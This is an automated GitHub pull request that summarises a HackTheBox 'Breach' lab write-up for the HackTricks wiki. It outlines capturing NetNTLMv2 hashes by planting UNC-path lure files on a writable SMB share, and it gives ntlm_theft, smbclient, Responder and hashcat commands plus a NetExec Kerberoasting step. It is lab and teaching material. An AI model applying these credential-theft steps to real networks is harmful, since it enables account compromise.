Conversation
Collaborator
Author
🔗 Additional ContextOriginal Blog Post: https://0xdf.gitlab.io/2026/02/10/htb-breach.html Content Categories: Based on the analysis, this content was categorized under "Windows / Active Directory Methodology -> NTLM -> Places to steal NTLM creds (add subsection: 'Writable SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)') and cross-link from 'Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks' and from 'Active Directory Methodology -> Kerberoast' (add NetExec ldap --kerberoast example)". Repository Maintenance:
Review Notes:
Bot Version: HackTricks News Bot v1.0 |
Collaborator
Author
|
merge |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
🤖 Automated Content Update
This PR was automatically generated by the HackTricks News Bot based on a technical blog post.
📝 Source Information
🎯 Content Summary
Title / Target: HackTheBox “Breach” is a Windows Domain Controller running Windows Server 2022 (Build
20348) with hostnameBREACHDCin domainbreach.vl. The post demonstrates a practical domain compromise path starting from guest SMB write access to NTLM credential interception, then Kerberoasting to recover a service account password. The intro also states the intended endgame chain: silver ticket → MSSQL sysadmin → xp_cmd...🔧 Technical Details
NTLM capture via writable SMB share lures (UNC-path coercion): If you can write to an SMB share that users/systems browse, drop files whose content references an attacker UNC path (e.g.,
\\10.10.14.16\share). Windows Explorer rendering (and some file handlers on open) can trigger automatic SMB authentication, producing a NetNTLMv2 challenge/response that tools like Responder can capture. Generate broad lure coverage withntlm_theft.py -g all -s <attacker_ip> -f <base>, upload viasmbclient(mput *), capture withResponder.py -I <iface>, then crack offline with hashcat (NetNTLMv2 autodetects to mode5600).Kerberoasting via LDAP (etype 23 TGS cracking): With any valid domain creds, request/collect Kerberos service tickets for SPN-bearing accounts and extract
$krb5tgs$23$material (RC4-HMAC / etype 23) for offline cracking. NetExec can automate extract...🤖 Agent Actions
Updated HackTricks with new NTLM lure technique and tooling:
This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.